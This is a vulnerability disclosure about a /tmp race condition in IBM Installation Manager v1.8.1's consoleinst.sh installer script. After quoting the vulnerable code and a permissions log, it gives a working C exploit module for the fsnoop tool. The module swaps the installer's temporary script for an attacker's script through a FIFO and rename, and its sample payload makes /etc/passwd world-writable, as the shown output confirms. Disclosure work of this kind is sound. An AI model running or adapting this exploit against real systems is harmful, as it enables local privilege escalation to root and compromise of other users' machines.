Title:/tmp race condition in IBM Installation Manager v1.8.1 install script
I noticed a /tmp race condition in IBM’s installation manager software install script
The code in consoleinst.sh is:


 46 TEMP=/tmp
 47 tempScript=$TEMP/consoleinst-$$.sh
 48 scriptLoc=`dirname "$0"`
 49 slash=`expr "$scriptLoc" : "\(/\)"`
 50 if [ "X$slash" != "X/" ]; then
 51         scriptLoc=`pwd`/$scriptLoc
 52 fi
 53 
 54 if [ "$0" != "$tempScript" ]; then
 55     cp "$0" "$tempScript"
 56     cd "$TEMP"
 57     origScriptLoc=$scriptLoc
 58     export origScriptLoc
 59     exec "$tempScript" $@
 60     # should not return from above exec
 61     exit 1
 62 fi


If you guess the pid and create the file before the installer script does you can inject code to be executed at line 59.

This is a log of me controlling permissions of the file during installation of the product:

[M] -rwxrwxrwx 1 larry larry 34  Thu Oct 29 21:46:10 2015 /tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0  Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225  Thu Oct 29 21:46:34 2015 /tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modifed (inotify() for the win) I could inject commands into that installation script./*
fsnoop v3.3 module for exploitation of: 
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for pointing me
at his /tmp race condition tool l0pht-watch.

@v14dz
http://vladz.devzero.fr/

$ make ibm-console.so

/tmp/x is :

#!/bin/sh
chmod 777 /etc/passwd

$ ./fsnoop -p ibm-consoleinst.so 
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb] file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.

ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22  2014 /etc/passwd

*/



#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char title[] = "** IBM Console Install Exploit **";

/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[]      = "/tmp/consoleinst-HEREPID.sh";

/* Evil routines */
void payload() { 
  int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after the cp command*/
  mkfifo(file, 0666);
  fd = open(file, O_RDONLY);
  rename(file, "/tmp/a");
  rename("/tmp/x", file);
}